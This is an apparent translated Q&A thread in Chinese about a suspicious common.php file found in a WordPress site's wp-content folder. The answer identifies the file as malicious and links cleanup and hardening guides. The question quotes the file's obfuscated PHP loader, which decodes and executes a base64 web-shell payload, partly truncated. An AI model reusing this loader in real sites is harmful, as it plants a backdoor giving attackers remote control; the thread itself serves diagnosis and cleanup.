损坏/黑客common.php文件?

时间:2017-06-20 12:09:02

标签: wordpress

我的一个wordpress网站存在问题。 (不断登出用户而不让人们登录)

我的托管认为路由是common.php文件(/public_html/wp-content/common.php)

任何人都可以了解文件实际上在做什么吗?我可以删除它吗?WordPress会生成一个新文件吗?

common.php代码:

    <?php

$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG

*我不得不在这里删除了很多代码,因为它超过了字符限制(abot 90,000 !!)

J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
    $array_name = "";
    foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
       $array_name .= $alphabet[$t];
    }
    $a = strrev("noi"."tcnuf"."_eta"."erc");
    $f = $a("", $array_name($string));
    $f();

提前致谢

1 个答案:

答案 0 :(得分:2)

删除文件。 它不是WordPress安装或升级包的一部分。我认为该文件是恶意的,并且您的托管帐户/个人计算机/登录凭据已被盗用或类似的东西。

这是此案例中提到的标准支持文档: https://codex.wordpress.org/FAQ_My_site_was_hacked

然后,一旦您的网站是干净:
http://codex.wordpress.org/Hardening_WordPress